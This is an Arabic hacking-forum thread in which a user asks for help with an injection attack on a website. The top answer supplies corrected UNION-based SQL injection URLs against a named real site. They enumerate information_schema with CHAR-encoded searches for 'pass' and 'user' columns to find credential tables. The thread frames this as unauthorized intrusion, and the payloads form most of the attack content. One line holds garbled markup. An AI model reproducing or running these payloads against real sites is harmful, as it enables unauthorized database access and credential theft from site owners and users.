التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام

		:: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب
[مشكلة] مساعدة بخصوص حقن موقع

11-18-2012, 01:32 AM

رقم المشاركة : 1 (permalink)

معلومات العضو

Senor os

زائـــر

إحصائية العضو

مجاب: مساعدة بخصوص حقن موقع

السلام عليكم المرجو المساعدة : كنت اقوم باختراق موقع لكن عندما وصلت الى where+column_name+LIKE+%pas% لا يظهر لي اي شيء ، ما الحل ؟؟؟

المصدر: :: vBspiders Professional Network ::

Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC lshu]m fow,w prk l,ru

أفضل جواب - كتبه googles

ممم المشكل سهل جدا لديك خطأ في الامر :
هذا هو الامر الذي وضعت :

كود PHP:

  www.pouet.net/bbses.php?which=-713 union select 1,2,3,4,5,6,concat(table_name,0x3a,column_name,0x3 a,table_schema),8,9+from+information_schema.column s+where+column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)--

أنظر هذا هو الامر الصحيح :

كود PHP:

  http://www.pouet.net/bbses.php?which=-713+union+select+1,2,3,4,5,6,group_concat(table_name,0x3a,column_name,0x3a,table_schema),8,9+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)--

اضغط هنا لرؤية الصورة
كما ترى لم يجد أي جدول أو أي عمود يحتوي على كلمة pass المشفرة بــ char

ولاكن يمكنك تشفير %user% بـ char لترى هل هناك نتيجة أم لا
طيب أنا قمت بتشفير %user%
هذا هو الامر :

كود PHP:

  http://www.pouet.net/bbses.php?which=-713+union+select+1,2,3,4,5,6,group_concat(table_name,0x3a,column_name,0x3a,table_schema),8,9+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 117, 115, 101, 114, 37)--

وهذه صورة توضيحية لنتيجة
اظغط هنا لرؤية الصورة

أترك لك البقية